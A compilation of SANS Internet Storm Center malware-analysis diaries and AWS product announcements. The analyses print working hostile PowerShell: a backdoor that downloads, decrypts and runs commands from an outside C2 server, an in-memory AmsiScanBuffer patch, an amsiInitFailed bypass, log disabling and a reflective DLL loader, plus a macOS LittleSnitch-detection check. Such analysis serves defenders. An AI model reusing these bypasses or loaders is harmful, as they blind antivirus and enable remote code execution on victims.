Live Patching Windows API Calls Using PowerShell, (Wed, Nov 25th)

This post was originally published on this site

It's amazing how attackers can be imaginative when it comes to protecting themselves and preventing security controls to do their job. Here is an example of a malicious PowerShell script that patches live a DLL function to change the way it works (read: "to make it NOT work"). This is not a new technique but it has been a while that I did not find it so, it deserves a quick review.

The original script has been spotted on Virustotal (SHA256:b2598b28b19d0f7e705535a2779018ecf1b73954c065a3d721589490d068fb54)[1] with a nice low score (3/60). The original file is interesting because it's a "bat" command line script and a PowerShell script at the same time:

# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -noLogo -noProfile -ExecutionPolicy bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B

The environment variable '%~f0' will expand to the complete path of the script (ex: "C:Tempmalicious.bat"). It is passed to PowerShell which will ignore the first line (starting with the '#'). The script will be deleted once PowerShell completed. Note, '%~dp0' will expand to the drive letter and path of that batch file.

The script itself is obfuscated inside a Base64-encoded string. First, it's a backdoor that tries to execute commands returned by the contacted C2 server. The HTTP connection is built in a specific way to talk to the server:

It requires a specific User-Agent:

$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$eBdd.HEadeRS.ADd('User-Agent',$u);

It tries to connect through the proxy configured in the system:

$EBdD.Proxy=[SYsTeM.NEt.WEBREqUeSt]::DeFAULtWEbProxY;
$ebdd.ProxY.CreDeNTIALS = [SyStEM.Net.CredeNTiAlCAche]::DeFauLTNETWoRKCreDeNtIalS;

A cookie is required:

$eBdd.HeAdErs.Add("Cookie","session=i9jI6+TRpy75U2v68M56EtGXOWE=");

The C2 address is obfuscated:

$ser=$([TEXT.EncoDing]::UNicODe.GEtSTrInG([ConvERT]::FRoMBAsE64STriNG('aAB0AHQAcAA6AC8ALwAzAC4AMQAyADgALgAxADAANwAuADcANAA6ADEANQA0ADMAMAA=')));
$t='/admin/get.php';
$daTa=$eBdD.DoWnLoadDaTA($seR+$T);

The C2 server is hxxp://%%ip:3.128.107.74%%:15430/admin/get.php.

Data received by the C2 are decrypted and executed via Invoke-Command (so, we expect PowerShell code)

$K=[SysteM.TExt.EncOdiNG]::ASCII.GeTBytEs('827ccb0eea8a706c4c34a16891f84e7b');
$R={
    $D,$K=$ARgS;$S=0..255;0..255|%{
        $J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;
        $H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];
        $_-bXOr$S[($S[$I]+$S[$H])%256]
    }
};

$Iv=$daTa[0..3];
$DAtA=$data[4..$DAtA.lenGtH];
-JoiN[CHAr[]](& $R $DatA ($IV+$K))|IEX

But the most interesting part of the script was the technique implemented to prevent the PowerShell script to be blocked by the antivirus.

First, it tries to disable ScriptBlockLogging[2]:

$vaL=[CollECtionS.GEnErIC.DiCTIONarY[StrING,SysteM.ObjEct]]::nEW();
$Val.AdD('EnableScriptB'+'lockLogging',0);
$VAl.AdD('EnableScriptBlockInvocationLogging',0);
$b399['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$vaL

Then, it tries to disable the API call AmsiScanBuffer() provided by amsi.dll. How? By patching the function and overwriting the beginning of the code with a simple return code to disable the function:

$MethodDefinition = "
  [DllImport(`"kernel32`")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  [DllImport(`"kernel32`")]public static extern IntPtr GetModuleHandle(string lpModuleName);
  [DllImport(`"kernel32`")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); 

Step 1: the script tries to locate the address of the function AmsiScanBuffer() in memory. To achieve this, it used the classic combination of GetModuleHandle() and GetProcAddress(). 

Step 2: the memory protection (where starts the function) is changed to allow writing executable code (the key flag is 0x40 or 'PAGE_EXECUTE_READWRITE')

Step 3: the memory location is overwritten with a buffer of six bytes: 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3.

This suite of bytes is the following code:

0x0000000000000000:  B8 57 00 07 80    mov eax, 0x80070057
0x0000000000000005:  C3                ret 

The value 0x80070057 is placed into the EAX register (which is used to hold the return value of the function). This value is 'E_INVALIDARG'. Then, the function immediately returns to the caller with the 'ret' instruction. This technique implements the bypass of the antivirus scan…

As I said, this technique is not new and has already been discussed previously (around 2019) but it's interesting to see how attackers re-use always and always good old techniques.

The fun part of the backdoor? I was not able to connect to it. The C2 seems to be an SSH server. Or did I miss something?

$ curl -v -A 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -H 'Cookie: session=i9jI6+TRpy75U2v68M56EtGXOWE=' hxxp://3[.]128[.]107[.]74:15430/admin/get.php
*   Trying 3[.]128[.]107[.]74...
* TCP_NODELAY set
* Connected to 3[.]128[.]107[.]74 (3[.]128[.]107[.]74) port 15430 (#0)
> GET /admin/get.php HTTP/1.1
> Host: 3[.]128[.]107[.]74:15430
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
> Referer: http://www.google.com/search?hl=en&q=web&aq=f&oq=&aqi=g1
> Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
> Accept-Language: en-us
> Connection: Keep-Alive
> Cookie: session=i9jI6+TRpy75U2v68M56EtGXOWE=
>
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.
* Closing connection 0

[1] https://www.virustotal.com/gui/file/b2598b28b19d0f7e705535a2779018ecf1b73954c065a3d721589490d068fb54/detection
[2] https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1
[3] https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The special case of TCP RST, (Tue, Nov 24th)

This post was originally published on this site

In TCP, packets with the "Reset" (RST or R) flag are sent to abort a connection. Probably the most common reason you are seeing this is that an SYN packet is sent to a closed port.

But RST packets may be sent in other cases to indicate that a connection should be closed. 

Lets first look at the reset in response to an SYN to a closed port:

IP (tos 0x0, ttl 64, id 0, offset 0, flags [none], proto TCP (6), length 64)
    192.0.2.1.65007 > 192.0.2.2.81: Flags [S], seq 3972116176, win 65535, options [mss 1460,nop,wscale 6,nop,nop,TS val 447631150 ecr 0,sackOK,eol], length 0
16:24:59.928936 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    192.0.2.2.81 > 192.0.2.1.65007: Flags [R.], seq 0, ack 3972116177, win 0, length 0

Interesting here: The sequence number of the RST packet is 0. If you are looking at "unusually frequent" sequence numbers, "0" may show up at the top if you had a lot of failed connections that resulted in resets.

For an RST in response to an SYN, the sequence number is not really used. This is the first packet arriving from that source, and no further packets will be sent. Also, there is nothing to acknowledge. So the sequence number, if there is one, would be ignored and as a result, the few operating systems I tested (BSD, macOS, Linux, Windows 10) all use a sequence number of 0.

Could this be used to help with spoofing TCP Resets? Not really. As there is no initial sequence number yet, the RST sequence number wouldn't add anything.

A second issue that sometimes causes confusion: RST packets with payload

IP (tos 0x0, ttl 64, id 49111, offset 0, flags [DF], proto TCP (6), length 51)
    192.0.2.43.37444 > 10.0.28.20.25: Flags [R.], seq 1:12, ack 1, win 57352, length 11 [RST 220 mailgat]

The RST packet above has a payload length of 11 bytes. tcpdump is nice enough to display the payload with a "RST" prefix. The actual payload here was "220 mailgat". This behavior is typical for security devices (the trace above is a bit old, but I believe the RST was created by a Cisco IPS at the time). The idea is that the payload will provide more information about why the IPS (and in some cases firewall) sent the RST. Someone once told me that there is an RFC describing this behaviour, but I haven't found it yet (if you know: please comment 😉 ).


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New – Code Signing, a Trust and Integrity Control for AWS Lambda

This post was originally published on this site

Code signing is an industry standard technique used to confirm that the code is unaltered and from a trusted publisher. Code running inside AWS Lambda functions is executed on highly hardened systems and runs in a secure manner. However, function code is susceptible to alteration as it moves through deployment pipelines that run outside AWS.

Today, we are launching Code Signing for AWS Lambda. It is a trust and integrity control that helps administrators enforce that only signed code packages from trusted publishers run in their Lambda functions and that the code has not been altered since signing.

Code Signing for Lambda provides a first-class mechanism to enforce that only trusted code is deployed in Lambda. This frees up organizations from the burden of building gatekeeper components in their deployment pipelines. Code Signing for AWS Lambda leverages AWS Signer, a fully managed code signing service from AWS. Administrators create Signing Profile, a resource in AWS Signer that is used for creating signatures and grant developers access to the signing profile using AWS Identity and Access Management (IAM). Within Lambda, administrators specify the allowed signing profiles using a new resource called Code Signing Configuration (CSC). CSC enables organizations to implement a separation of duties between administrators and developers. Administrators can use CSC to set code signing policies on the functions, and developers can deploy code to the functions.

How to Create a Signing Profile
You can use AWS Signer console to create a new Signing profile. A signing profile can represent a group of trusted publishers and is analogous to the use of a digital signing certificate.

By clicking Create Signing Profile, you can create a Signing Profile that can be used to create signed code packages.

You can assign Signature validity period for the signatures generated by a Signing Profile between 1 day and 135 months.

How to create a Code Signing Configuration (CSC)
You can configure your functions to use Code Signing through the AWS Lambda console, Command-line Interface (CLI), or APIs by creating and attaching a new resource called Code Signing Configuration to the function. You can find Code signing configurations under Additional resources menu.

You can click Create configuration to define signing profiles that are allowed to sign code artifacts for this configuration, and set signature validation policy. To add an allowed signing profile, you can either select from the dropdown, which shows all signing profiles in your AWS account, or add a signing profile from a different account by specifying the version ARN.

Also, you can set the signature validation policy to either ‘Warn’ or ‘Enforce’. With ‘Warn’, Lambda logs a Cloudwatch metric if there is a signature check failure but accepts the deployment. With ‘Enforce’, Lambda rejects the deployment if there is a signature check failure. Signature check fails if the signature signing profile does not match one of the allowed signing profiles in the CSC, the signature is expired, or the signature is revoked. If the code package is tampered or altered since signing, the deployment is always rejected, irrespective of the signature validation policy.

You can use new Lambda API CreateCodeSigningConfig to create a CSC too. You can see the JSON request syntax below.

{
     "CodeSigningConfigId": string,
     "CodeSigningConfigArn": string,
     "Description": string,
     "AllowedPublishers": {
           "SigningProfileVersionArns": [string]
      },
     "CodeSigningPolicies": {
     "UntrustedArtifactOnDeployment": string,   // WARN OR ENFORCE
    },
     "LastModified”: string
}

Let’s Enable Code Signing for Your Lambda Functions
To enable Code Signing feature for your Lambda functions, you can select a function and click Edit in Code signing configuration section.

Select one of the available CSCs and click the Save button.

Once your function is configured to use code signing, you need to upload signed .zip file or Amazon S3 URL of a signed .zip made by a signing job in AWS Signer.

How to Create a Signed Code Package
Choose one of the allowed signing profiles and specify the S3 location of the code package ZIP file to be signed. Also, specify a destination path where the signed code package should be uploaded.

A signing job is an asynchronous process that generates a signature for your code package and puts the signed code package in the specified destination path.

Once signing job is succeeded, you can find signed ZIP packages in your assigned S3 bucket.

Back to Lambda console, you can now publish the signed code package to the Lambda function. Lambda will perform signature checks to verify that the code has not been altered since signing and that the code is signed by one of the allowed signing profile.

You can also enable code signing for a function using CreateFunction or PutFunctionCodeSigningConfig APIs by attaching a CSC to the function.

Developers can also use SAM CLI to sign code packages. They do this by specifying the signing profiles at package or deploy stage. SAM CLI automatically starts the signing workflow before deploying the code to Lambda.

Code Signing is also supported by Infrastructure as code tools like AWS CloudFormation and Terraform. Terraform also allows developers to sign code, in addition to declaring and creating code signing resources.

Now Available
Code Signing for AWS Lambda is available in all commercial regions except AWS China Regions, AWS GovCloud (US) Regions, and Asia Pacific (Osaka) Region. There is no additional charge for using code signing, and customers pay the standard price for Lambda functions.

To learn more about Code Signing for AWS Lambda and AWS Signer, please visit the Lambda developer guide and send us feedback either in the forum for AWS Lambda or through your usual AWS support contacts.

Channy;

New – Multi-Factor Authentication with WebAuthn for AWS SSO

This post was originally published on this site

Starting today, you can add WebAuthn as a new multi-factor authentication (MFA) to AWS Single Sign-On, in addition to currently supported one-time password (OTP) and Radius authenticators. By adding support for WebAuthn, a W3C specification developed in coordination with FIDO Alliance, you can now authenticate with a wide variety of interoperable authenticators provisioned by your system administrator or built into your laptops or smartphones. For example, you can now tap a hardware security key, touch a fingerprint sensor on your Mac, or use facial recognition on your mobile device or PC to authenticate into the AWS Management Console or AWS Command Line Interface (CLI).

With this addition, you can now self-register multiple MFA authenticators. Doing so allows you to authenticate on AWS with another device in case you lose or misplace your primary authenticator device. We make it easy for you to name your devices for long-term manageability.

WebAuthn two-factor authentication is available for identities stored in the AWS Single Sign-On internal identity store and those stored in Microsoft Active Directory, whether it is managed by AWS or not.

What are WebAuthn and FIDO2?

Before exploring how to configure two-factor authentication using your FIDO2-enabled devices, and to discover the user experience for web-based and CLI authentications, let’s recap how FIDO2, WebAuthn and other specifications fit together.

FIDO2 is made of two core specifications: Web Authentication (WebAuthn) and Client To Authenticator Protocol (CTAP).

Web Authentication (WebAuthn) is a W3C standard that provides strong authentication based upon public key cryptography. Unlike traditional code generator tokens or apps using TOTP protocol, it does not require sharing a secret between the server and the client. Instead, it relies on a public key pair and digital signature of unique challenges. The private key never leaves a secured device, the FIDO-enabled authenticator. When you try to authenticate to a website, this secured device interacts with your browser using the CTAP protocol.

WebAuthn is strong: Authentication is ideally backed by a secure element, which can safely store private keys and perform the cryptographic operations. It is scoped: A key pair is only useful for a specific origin, like browser cookies. A key pair registered at console.amazonaws.com cannot be used at console.not-the-real-amazon.com, mitigating the threat of phishing. Finally, it is attested: Authenticators can provide a certificate that helps servers verify that the public key did in fact come from an authenticator they trust, and not a fraudulent source.

To start to use FIDO2 authentication, you therefore need three elements: a website that supports WebAuthn, a browser that supports WebAuthn and CTAP protocols, and a FIDO authenticator. Starting today, the SSO Management Console and CLI now support WebAuthn. All modern web browsers are compatible (Chrome, Edge, Firefox, and Safari). FIDO authenticators are either devices you can use from one device or another (roaming authenticators), such as a YubiKey, or built-in hardware supported by Android, iOS, iPadOS, Windows, Chrome OS, and macOS (platform authenticators).

How Does FIDO2 Work?
When I first register my FIDO-enabled authenticator on AWS SSO, the authenticator creates a new set of public key credentials that can be used to sign a challenge generated by AWS SSO Console (the relaying party). The public part of these new credentials, along with the signed challenge, are stored by AWS SSO.

When I want to use WebAuthn as second factor authentication, the AWS SSO console sends a challenge to my authenticator. This challenge can then be signed with the previously generated public key credentials and sent back to the console. This way, AWS SSO console can verify that I have the required credentials.

How Do I Enable MFA With a Secure Device in the AWS SSO Console?
You, the system administrator, can enable MFA for your AWS SSO workforce when the user profiles are stored in AWS SSO itself, or stored in your Active Directory, either self-managed or a AWS Directory Service for Microsoft Active Directory.

To let my workforce register their FIDO or U2F authenticator in self-service mode, I first navigate to Settings, click Configure under Multi-Factor Authentication. On the following screen, I make four changes. First, under Users should be prompted for MFA, I select Every time they sign in. Second, under Users can authenticate with these MFA types, I check Security Keys and built-in authenticators. Third, under If a user does not yet have a registered MFA device, I check Require them to register an MFA device at sign in. Finally, under Who can manage MFA devices, I check Users can add and manage their own MFA devices. I click on Save Changes to save and return.

Configure SSO 2

That’s it. Now your workforce is prompted to register their MFA device the next time they authenticate.

What Is the User Experience?
As an AWS console user, I authenticate on the AWS SSO portal page URL that I received from my System Administrator. I sign in using my user name and password, as usual. On the next screen, I am prompted to register my authenticator. I check Security Key as device type. To use a biometric factor such as fingerprints or face recognition, I would click Built-in authenticator.

Register MFA Device

The browser asks me to generate a key pair and to send my public key. I can do that just by touching a button on my device, or providing the registered biometric, e.g. TouchID or FaceID.Register a security keyThe browser does confirm and shows me a last screen where I have the possibility to give a friendly name to my device, so I can remember which one is which. Then I click Save and Done.Confirm device registrationFrom now on, every time I sign in, I am prompted to touch my security device or use biometric authentication on my smartphone or laptop. What happens behind the scene is the server sending a challenge to my browser. The browser sends the challenge to the security device. The security device uses my private key to sign the challenge and to return it to the server for verification. When the server validates the signature with my public key, I am granted access to the AWS Management Console.

Additional verification required

At any time, I can register additional devices and manage my registered devices. On the AWS SSO portal page, I click MFA devices on the top-right part of the screen.

MFA device management

I can see and manage the devices registered for my account, if any. I click Register device to register a new device.

How to Configure SSO for the AWS CLI?
Once my devices are configured, I can configure SSO on the AWS Command Line Interface (CLI).

I first configure CLI SSO with aws configure sso and I enter the SSO domain URL that I received from my system administrator. The CLI opens a browser where I can authenticate with my user name, password, and my second-factor authentication configured previously. The web console gives me a code that I enter back into the CLI prompt.aws configure sso

When I have access to multiple AWS Accounts, the CLI lists them and I choose the one I want to use. This is a one-time configuration.

Once this is done, I can use the aws CLI as usual, the SSO authentication happens automatically behind the scene. You are asked to re-authenticate from time to time, depending on the configuration set by your system administrator.

Available today
Just like AWS Single Sign-On, FIDO2 second-factor authentication is provided to you at no additional cost, and is available in all AWS Regions where AWS SSO is available.

As usual, we welcome your feedback. The team told me they are working on other features to offer you additional authentication options in the near future.

You can start to use FIDO2 as second factor authentication for AWS Single Sign-On today. Configure it now.

— seb

Quick Tip: Cobalt Strike Beacon Analysis, (Mon, Nov 23rd)

This post was originally published on this site

Several of our handlers, like Brad and Renato, have written diary entries about malware infections that involved the red team framework Cobalt Strike.

In this diary entry, I'll show you how you can quickly extract the configuration of Cobalt Strike beacons mentioned in these 2 diary entries:

  1. Hancitor infection with Pony, Evil Pony, Ursnif, and Cobalt Strike
  2. Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike

The configuration of a beacon is stored as an encoded table of type-length-value records. There are a couple of tools to analyze Cobalt Strike beacons, and I recently made my own tool 1768.py public.

The analysis of the sample that Brad mentioned in his diary entry (1) is simple:

In the screenshot above, you can see all the records of the decoded configuration of this sample. Records that you might be most interested in as an analyst, are the server record, the port record and the URL used with GET and POST (highlighted in red).

In Renato's diary entry (2), there are 2 artifacts to analyze.

There's the shellcode: Renato explained how to deal with the different layers of obfuscation of this shellcode.

Here I use different of my tools to deobfuscate the shellcode, and then pass it on to my 1768.py tool:

The payload downloaded by this shellcode is easy to analyze:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Quick Tip: Extracting all VBA Code from a Maldoc – JSON Format, (Sun, Nov 22nd)

This post was originally published on this site

In diary entry "Quick Tip: Extracting all VBA Code from a Maldoc" I explain which options to use with oledump.py to extract all VBA code with a single command.

I promised that I would update oledump.py so that it can also produce JSON output with all VBA code.

This is now done with version 0.0.55. Existing option -j (–json) produces a JSON object with the content (base64 encoded) of each stream found inside the analyzed ole file. Combining option -j and -v produces a JSON object with the VBA code (base64 encoded) of each stream module found inside the analyzed ole file:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious Python Code and LittleSnitch Detection, (Fri, Nov 20th)

This post was originally published on this site

We all run plenty of security tools on our endpoints. Their goal is to protect us by preventing infection (or trying to prevent it). But all those security tools are present on our devices like normal applications and are, therefore, easy to detect. Techniques to detect the presence of such security tools are multiple:

  • Detecting processes
  • Detecting windows (via the title)
  • Detecting configuration (files or registries)
  • Detecting injected DLL
  • Detecting debuggers

Those techniques remain the same on every operating system (with some deviations of course – the registry is specific to Windows). I found a malicious script targeting macOS computers which implements a very basic check to detect the presence of LittleSnitch[1]. This tool is very popular amongst Apple users. It detects and reports all attempts to connect to the Internet by applications (egress traffic). For malware, it's important to stay stealthy and the presence of LittleSnitch could reveal an attempt to connect to a C2 server.

I spotted a simple Python script (SHA256:e5eb6d879eaca9b29946a9e5b611d092e0cce3a9821f2b9e0ba206ac5b375f8b) part of a red-team exercise, that tris to detect the presence of LittleSnitch:

cmd = "ps -ef | grep Little Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()

Simple but effective!

[1] https://www.obdev.at/products/littlesnitch/index.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Multi-Region Replication Now Enabled for AWS Managed Microsoft Active Directory

This post was originally published on this site

Our customers build applications that need to serve users that live in all corners of the world. When listening to our customers, they told us that whilst they were comfortable building Active Directory (AD) aware applications on AWS, making them work globally can be a real challenge.

Customers told us that AWS Directory Service for Microsoft Active Directory had saved them time and money and provided them with all the capabilities they need to run their AD-aware applications. However, if they wanted to go global, they needed to create independent AWS Managed Microsoft AD directories per Region. They would then need to create a solution to synchronize data across each Region. This level of management overhead is significant, complex, and costly. It also slowed customers as they sought to migrate their AD-aware workloads to the cloud.

Today, I want to tell you about a new feature that allows customers to deploy a single AWS Managed Microsoft AD across multiple AWS Regions. This new feature called multi-region replication automatically configures inter-region networking connectivity, deploys domain controllers, and replicates all the Active Directory data across multiple Regions, ensuring that Windows and Linux workloads residing in those Regions can connect to and use AWS Managed Microsoft AD with low latency and high performance. AWS Managed Microsoft AD makes it more cost-effective for customers to migrate AD-aware applications and workloads to AWS and easier to operate them globally. In addition, automated multi-region replication provides multi-region resiliency.

AWS can now synchronize all customer directory data, including users, groups, Group Policy Objects (GPOs), and schema across multiple Regions. AWS handles automated software updates, monitoring, recovery, and the security of the underlying AD infrastructure across all Regions, enabling customers to focus on building their applications. Integrating with Amazon CloudWatch Logs and Amazon Simple Notification Service (SNS), AWS Managed Microsoft AD makes it easy for customers to monitor the directory’s health, and security logs globally.

How It Works 
Let me show you how to create an Active Directory that spans multiple Regions using the AWS Managed Microsoft AD console. You do not have to create a new directory to use multi-region replication it will work on all your existing directories too.

First, I create a new Directory following the normal steps. I select Enterprise Edition since this is the only edition that supports multi-region replication.

I give my Directory a name and a description and then set an Admin password. I then click Next which takes me to the Networking setup.

I select a Amazon Virtual Private Cloud that I use for demos and then choose two subnets which are in separate Availability Zones. The AWS Managed Microsoft AD deploys two domain controllers per region and places them in separate subnets which are in different Availability Zones, this is done for resiliency reasons so that the directory can still operate even if one of the Availability Zones has issues.

Once I click next, I am presented with the review screen and I click Create Directory.

The directory takes between 20-45 minutes to be created. There is now a column on the Directories listing page that says Multi-Region, this directory has this value currently set to No indicating that it does not span multiple Regions

Once the directory has been created, I click on the Directory ID and drill into the details. I now have a new section called Multi-Region replication and there is a button called Add Region. If I click this button I can then configure an additional Region.

I select the Region that I want to add to my directory, in this example US West (Oregon) us-west-2, I then select a VPC in that Region and two subnets that must reside in separate Availability Zones. Finally, I click the Add button to add this new Region for my directory.

Now back on the directory details page I see there are two Regions listed one in US East (N. Virginia) and one in US West (Oregon), again the creation process can take upto 45 minutes, but once it has complete I will have my directory replicated across two Regions.

Costs
You pay by the hour for the domain controllers in each region, plus the cross-region data transfer. It’s important to understand that this feature will create two domain controllers in each Region that you Add, and so applications that reside in these Regions can now communicate with a local directory which lowers costs by minimizing the need for data transfer. To learn more, visit the pricing page.

Available Now
This new feature can be used today and is available for both new and existing directories that use the Enterprise Edition in any of the following Regions: US East (N. Virginia), US East (Ohio), US West (N. California), US West (Oregon), AWS GovCloud (US-East), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), Europe (Stockholm), and South America (São Paulo).

Head over to the product page to learn more, view pricing, and get started creating directories that span multiple AWS Regions.

Happy Administering

— Martin

PowerShell Dropper Delivering Formbook, (Thu, Nov 19th)

This post was originally published on this site

Here is an interesting PowerShell dropper that is nicely obfuscated and has anti-VM detection. I spotted this file yesterday, called 'ad.jpg' (SHA256:b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088). Of course, it's not a picture but a huge text file with Base64-encoded data. The VT score is therefore interesting: 0/61![1]. Once decoded, we discover the obfuscated PowerShell code. Let's review the techniques implemented by the attacker.

First, we see this at the very beginning of the script:

[Ref].Assembly.GetType('System.Management.Automation.'+$([CHAr]([Byte]0x41)+[ChAr]([bYTe]0x6D)+[Char](82+33)+
[ChAr]([BYTe]0x69))+'Utils').GetField($([SyStEM.Net.WEBUTilItY]::htMLdeCode('amsiI 
nitFailed')),'NonPublic,Static').SetValue($null,$true);

Which is deobfuscated into:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils.amsiInitFailed)),'NonPublic,Static').SetValue($null,$true);

This piece of code comes from the PoSHBypass[2] project. It's a  proof of concept that allows an attacker to bypass PowerShell's Constrained Language Mode, AMSI and ScriptBlock, and Module logging.

Then, classic behaviour, we have an obfuscation of the Invoke-Expression cmdlet:

$ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID='MEX'.replace('M','I');
sal g $ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID;

This code will make 'g' an alias of Invoke-Expression. This is used immediately to decode and execute the following chunk of data:

[Byte[]]$IMAGE_NT_HEADERS=('@1F,@8B,@08,@00,@00,@00,@00,@00,@04,@00,@ED,@BD,@07,@60,@1C,@49,@96,@25,@26,@2F,@6D,@CA,@7B,@7F,@4A,
@F5,@4A,@D7,@E0,@74,@A1,@08,@80,@60,@13,@24,@D8,@90,@40,@10,@EC,@C1,@88,@CD,@E6,@92,@EC,@1D,@69,@47,
@23,@29,@AB,@2A,@81,@CA,@65,@56,@65,@5D,@66,@16,@40,@CC,@ED,@9D,@BC,@F7,@DE,@7B,@EF,@BD,@F7,@DE,@7B,
@EF,@BD,@F7,@BA,@3B,@9D,@4E,@27,@F7,@DF,@FF,@3F,@5C,@66,@64,@01,@6C,@F6,@CE,@4A,@DA,@C9,@9E,@21,@80,
...
@34,@6F,@8F,@7E,@8D,@1F,@23,@18,@C7,@CC,@FF,@18,@F3,@84,@A0,@83,@EB,@FB,@70,@EE,@D3,@BB,@BB,@0A,@6B,
@C7,@D2,@E4,@47,@CF,@FF,@B7,@9E,@5F,@E3,@E5,@AF,@43,@5C,@4C,@72,@77,@FF,@FF,@63,@78,@FF,@E8,@F9,@46,
@9E,@FF,@07,@78,@61,@2A,@8D,@00,@42,@04,@00,@00'.replace('@','0x'))| g;

The result string is passed to the following function:

function JAPFYAQPECMKYQNLCJXCOFSVYMER {
  [CmdletBinding()]
  Param ([bYte[]] $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay)
  Process {
    $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput = New-Object System.IO.MemoryStream( , $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay )
    $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut = New-Object System.IO.MemoryStream
    $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE = New-Object System.IO.Compression.GzipStream $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput, ([IO.Compression.CompressionMode]::Decompress)
    $EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL = New-Object bYtE[](1024)
    while($tRUe){
      $BBYRATZNTGIAUBPDRVBIQAMRDMERREread = $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE.Read($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, 1024)
      if ($BBYRATZNTGIAUBPDRVBIQAMRDMERREread -lE 0){bReAk}
      $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.Write($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, $BBYRATZNTGIAUBPDRVBIQAMRDMERREread)
    }
    [bYte[]] $QTXDBVKLTJMGOACBLEIVSJSQHMIDouT = $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.ToArray()
  }
}

It will uncompress the buffer and generate a DLL (SHA256:A7D74BE8AF1645FBECFC2FE915E0B77B287CE09AD3A7E220D20794475B0401F9) which is not present on VT at this time. This DLL is injected in the PowerShell process:

[bYte[]]$decompressedByteArray = JAPFYAQPECMKYQNLCJXCOFSVYMER $IMAGE_NT_HEADERS
$t=[System.Reflection.Assembly]::Load($decompressedByteArray)

Then, another chunk of data is decoded:

[Byte[]]$HNAUVVBGYKNXXMOTZHSTOHTKRMID=('@4D,@5A,@45,@52,@E8,@00,@00,@00,@00,@58,@83,@E8,@09,@8B,@C8,@83,@C0,@3C,@8B,@00,@03,@C1,@83,@C0,@28,@03,@08,
@FF,@E1,@90,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,
